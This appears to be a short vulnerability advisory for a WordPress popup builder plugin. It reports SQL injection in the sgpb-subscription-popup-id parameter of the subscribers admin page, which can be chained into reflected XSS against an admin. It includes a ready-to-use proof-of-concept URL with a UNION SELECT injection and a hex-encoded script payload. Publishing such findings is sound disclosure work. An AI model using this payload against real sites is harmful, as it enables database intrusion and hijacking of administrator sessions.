The plugin does not sanitise and escape the sgpb-subscription-popup-id parameter before using it in a SQL statement in the All Subscribers admin dashboard, leading to a SQL injection, which could also be used to perform Reflected Cross-Site Scripting attack against a logged in admin opening a malicious link
https://example.com/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscription-popup-id=0%29+union+all++select+1%2C0x3c696d6720737263206f6e6572726f723d616c6572742831293e%2C3%2C4%2C5%2C6+--+g
Krzysztof Zając
Krzysztof Zając
Yes
2022-03-07 (about 10 months ago)
2022-03-07 (about 10 months ago)
2022-04-08 (about 9 months ago)